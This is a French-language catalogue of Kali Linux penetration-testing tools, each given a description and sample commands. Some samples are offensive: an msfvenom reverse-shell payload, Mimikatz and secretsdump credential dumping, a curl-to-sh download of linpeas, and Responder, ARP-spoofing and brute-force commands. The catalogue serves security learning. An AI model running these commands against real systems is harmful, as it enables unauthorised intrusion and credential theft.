Catalogue d'Outils Kali Linux

Explorez les 130+ outils inclus dans Kali Linux, triés par catégorie

Nmap

Débutant

Scanner de réseau et de ports le plus connu. Découverte d'hôtes, fingerprinting OS, et détection de services.

nmap -sV -sC target.com nmap -A -T4 192.168.1.0/24 nmap --script vuln target.com
reseauportsscandiscovery

Maltego

Intermédiaire

Outil de visualisation de relations et d'analyse de renseignement (OSINT). Cartographie de données pubs.

maltego
osintvisualisationreconnaissance

Recon-ng

Intermédiaire

Framework de reconnaissance OSINT complet. Module à l'image de Metasploit pour la collecte de données.

recon-ng workspaces create project1 modules install brute_hosts
osintreconnaissanceframework

theHarvester

Débutant

Collecte d'emails, sous-domaines, noms d'hôtes et IPs à partir de sources publiques.

theHarvester -d target.com -b google,linkedin
emailsous-domainesosint

Shodan

Intermédiaire

Moteur de recherche pour les appareils IoT et services réseau connectés à Internet.

shodan search apache country:FR shodan host 8.8.8.8
iotinternetreconnaissanceapi

Whois / Dig / NSLookup

Débutant

Requêtes DNS et information sur les domaines. Résolution de noms et information WHOIS.

whois target.com dig target.com ANY nslookup target.com
dnswhoisreconnaissance

Netdiscover

Débutant

Découverte d'hôtes réseau via ARP. Identification des appareils connectés au réseau local.

netdiscover -r 192.168.1.0/24 netdiscover -i eth0 -l scan.pcap
arpreseaudiscovery

DNSrecon

Intermédiaire

Énumération DNS avancée : zone transfer, sous-domaines, enregistrements records.

dnsrecon -d target.com -t std dnsrecon -d target.com -t axfr
dnsenumérationreconnaissance

Nikto

Débutant

Scanner de serveur web. Détecte les fichiers dangereux, les CGI obsolètes, et les problèmes de config.

nikto -h http://target.com nikto -h target.com -p 8080
webscanvulnerabilites

OpenVAS / Greenbone

Intermédiaire

Scanner de vulnérabilités complet et gratuit. Alternative open-source à Nessus.

gvm-start
vulnerabilitesscancomplet

Dirb / Gobuster / Feroxbuster

Débutant

Énumération de dossiers et fichiers cachés sur les serveurs web via dictionnaires.

dirb http://target.com gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt feroxburst -u http://target.com -w wordlist.txt
webenumérationbrute-force

Enum4linux-ng

Intermédiaire

Énumération des services SMB/Samba. Extraction d'informations sur les partages et utilisateurs.

enum4linux-ng -A 192.168.1.10
smbenumérationwindows

Amass

Intermédiaire

Énumération de sous-domaines et cartographie d'infrastructure externe pour OSINT.

amass enum -passive -d target.com amass enum -active -d target.com
sous-domainesosintenumération

Metasploit Framework

Intermédiaire

Framework d'exploitation le plus puissant. Milliers d'exploits, payloads, et modules post-exploitation.

msfconsole msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 -f exe -o shell.exe
exploitationframeworkpayloads

SQLMap

Intermédiaire

Outil automatisé de détection et d'exploitation d'injections SQL. Prend en charge tous les SGBD.

sqlmap -u "http://target.com/?id=1" --dbs sqlmap -r request.txt --dump
sql-injectionwebautomatisé

SET (Social Engineering Toolkit)

Intermédiaire

Framework d'ingénierie sociale. Phishing, clonage de sites, et payloads avancés.

setoolkit
ingénierie-socialephishingexploitation

BeEF

Intermédiaire

Browser Exploitation Framework. Utilise les vulnérabilités du navigateur pour le contrôle à distance.

beef-xss
xssnavigateurexploitation

Armitage

Intermédiaire

Interface graphique pour Metasploit. Visualisation de réseau et exploitation interactive.

armitage
metasploitgraphiqueexploitation

Mimikatz

Expert

Extraction de credentials Windows : mots de passe en clair, Kerberos tickets, NTLM hashes.

sekurlsa::logonpasswords lsadump::sam kerberos::list
credentialswindowskerberos

BloodHound

Expert

Cartographie d'Active Directory. Identifie les chemins d'attaque vers le Domain Admin.

bh SharpHound.exe -c All
active-directorycartographiepost-exploitation

Impacket

Expert

Collection d'outils Python pour protocoles réseau Windows. PsExec, WMIExec, Kerberos.

impacket-psexec domain/user:password@target impacket-secretsdump domain/user:password@target
pythonwindowspost-exploitation

LinPEAS / WinPEAS

Intermédiaire

Scripts d'énumération automatique pour Linux et Windows. Trouve les vecteurs d'escalade de privilèges.

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh .\winPEAS.exe
enumerationescaladeautomatisé

Responder

Intermédiaire

Poisoning LLMNR, NBT-NS et MDNS. Capture des hashes NTLMv2 sur le réseau local.

responder -I eth0 -wrf
poisoningntlmreseau

Wireshark

Débutant

Analyseur de protocoles réseau. Capture et analyse de paquets en temps réel.

wireshark tshark -i eth0 -f "tcp port 80"
reseaucaptureanalyse

Bettercap

Intermédiaire

Framework MITM complet. ARP spoofing, DNS spoofing, sniffing, et injection de packets.

bettercap -iface eth0 net.probe on; net.sniff on; arp.spoof on
mitmarpdnssniffing

Ettercap

Intermédiaire

Outil MITM pour ARP poisoning, DNS spoofing, et filtrage de contenu.

ettercap -G ettercap -T -M arp // //
mitmarpsniffing

tcpdump

Débutant

Analyseur de paquets en ligne de commande. Capture réseau légère et puissante.

tcpdump -i eth0 -w capture.pcap tcpdump -r capture.pcap host 192.168.1.1
reseaucapturecli

John the Ripper

Intermédiaire

Casseur de mots de passe. Supporte des centaines de formats de hash.

john --wordlist=rockyou.txt hash.txt john --format=raw-md5 hash.txt
hashcrackingmots-de-passe

Hashcat

Intermédiaire

Casseur de mots de passe GPU. Le plus rapide pour les attaques par force brute et dictionnaire.

hashcat -m 0 hash.txt rockyou.txt hashcat -a 3 -m 0 hash.txt ?a?a?a?a
gpuhashcracking

Hydra

Débutant

Brute force en ligne. HTTP, SSH, FTP, SMB, et des dizaines d'autres protocoles.

hydra -l admin -P wordlist.txt ssh://target hydra -l admin -P wordlist.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
brute-forceonlineauthentification

Medusa / Ncrack

Intermédiaire

Brute force parallèle sur plusieurs protocoles réseau. Alternatives à Hydra.

medusa -h target -u admin -P wordlist.txt -M ssh ncrack -p ssh target
brute-forceparallèlereseau

Crunch

Débutant

Générateur de wordlists personnalisées basé sur des critères définis.

crunch 8 8 -t @@@@1234 -o wordlist.txt crunch 4 4 -f /usr/share/crunch/charset.lst numeric
wordlistsgénérationmots-de-passe

Aircrack-ng

Intermédiaire

Suite complète d'audit WiFi : monitoring, capture, injection, et cracking WPA/WEP.

airmon-ng start wlan0 airodump-ng wlan0mon airodump-ng -c 6 --bssid XX:XX:XX -w capture wlan0mon aircrack-ng -w rockyou.txt capture-01.cap
wificrackinginjection

Wifite

Débutant

Automatisation des attaques WiFi. Supporte WEP, WPA, et WPS.

wifite wifite --wpa --dict rockyou.txt
wifiautomatisécracking

Kismet

Intermédiaire

Détecteur de réseaux sans fil, sniffing, et analyse de trafic 802.11.

kismet -c wlan0
wifidétectionsniffing

hostapd-mana

Expert

Evil Twin / Rogue AP avancé. Capture de credentials et attaques mitM WiFi.

hostapd-mana hostapd-mana.conf
evil-twinmitmwifi

Autopsy

Intermédiaire

Plateforme d'analyse forensique numérique. Analyse de disques, timeline, et artefacts.

autopsy
forensicsdisqueanalyse

Volatility

Expert

Analyse forensique de mémoire RAM. Extraction de processus, réseaux, et artefacts.

volatility -f mem.raw imageinfo volatility -f mem.raw --profile=Win7SP1x64 pslist
forensicsmemoireram

Binwalk

Intermédiaire

Analyse et extraction de firmware. Identifie les fichiers embarqués dans les images binaires.

binwalk firmware.bin binwalk -e firmware.bin
firmwareextractionforensics

Foremost / Scalpel

Débutant

Récupération de fichiers (file carving). Reconstruction de fichiers supprimés depuis des images disques.

foremost -i image.dd -o recovered/ scalpel image.dd -o output/
recoveryforensicsfichiers

Burp Suite

Intermédiaire

Kit de test de sécurité web. Proxy, scanner, intruder, et repeater pour pentest web.

burpsuite
webproxyscannerpentest

WPScan

Débutant

Scanner de vulnérabilités WordPress. Détecte les plugins, thèmes vulnérables et config faible.

wpscan --url http://target.com wpscan --url http://target.com --enumerate vp,vt,u
wordpressvulnerabilitesweb

OWASP ZAP

Débutant

Scanner de sécurité web gratuit. Alternatives open-source à Burp Suite Pro.

zaproxy
webscannerowaspgratuit

Commix

Intermédiaire

Outil automatisé d'injection de commandes OS. Détecte et exploite les vulnérabilités d'injection.

commix -u "http://target.com/page?id=1"
command-injectionwebautomatisé

Ghidra

Intermédiaire

Outil de reverse engineering de la NSA. Décompilateur et désassembleur multi-architectures.

ghidraRun
reverse-engineeringdecompilateurnsa

Radare2 (r2)

Expert

Framework de reverse engineering en ligne de commande. Désassemblage, debug, et analyse.

r2 -A binary aaa; pdf @main
reverse-engineeringcliavancé

GDB + GEF/pwndbg

Expert

GNU Debugger avec extensions pour l'exploitation et l'analyse de binaires.

gdb ./binary gef info functions break main; run
debuggerexploitationbinaires

FLOSS

Intermédiaire

Extraction automatique de strings obfusquées dans les binaires malveillants.

floss malware.exe
stringsmalwareanalyse